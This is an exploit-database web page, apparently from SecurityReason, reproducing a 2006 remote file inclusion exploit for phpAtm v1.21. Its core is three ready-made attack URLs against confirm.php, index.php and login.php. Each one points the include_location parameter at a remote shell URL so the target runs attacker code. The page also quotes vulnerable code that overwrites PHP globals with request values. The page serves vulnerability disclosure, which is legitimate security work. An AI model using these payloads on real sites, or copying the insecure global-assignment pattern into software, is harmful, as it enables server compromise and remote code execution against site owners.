|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 1110 Credit : KinSize [MHG Security Team] Date : 30.08.2006 Exploit Code : ######################################################################## # phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit # # Level : Dangerous # Download : http://phpatm.free.fr/ # Version : v1.21 # # Found By: KinSize [MHG Security Team] # ######################################################################## # Code : include($include_location.'include/conf.php'); # # exploit: # http://www.sitename.com/[script_path]/confirm.php?include_location=http://s hellurl.com ? # http://www.sitename.com/[script_path]/index.php?include_location=http://she llurl.com ? # http://www.sitename.com/[script_path]/login.php?include_location=http://she llurl.com ? ######################################################################## # #Conatact : nefretaskimdir[at]gmail.com # # GreetZ : Damage-N | by_emr3 | by_OkSit | ESKOBAR | Ye.iL | PowerCobra | sys-worm(Turkish)| Z e b e r u S | ALL Turkish & MusLim ######################################################################## Added information: At first glance this doesn't look vulnerable but then again: line 85-94 of common.php while (list(, $arr) = each($sysarr)) { if (is_array($arr)) { while (list($key, $value) = each($arr)) { $GLOBALS[$key] = $value; } } } /str0ke  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |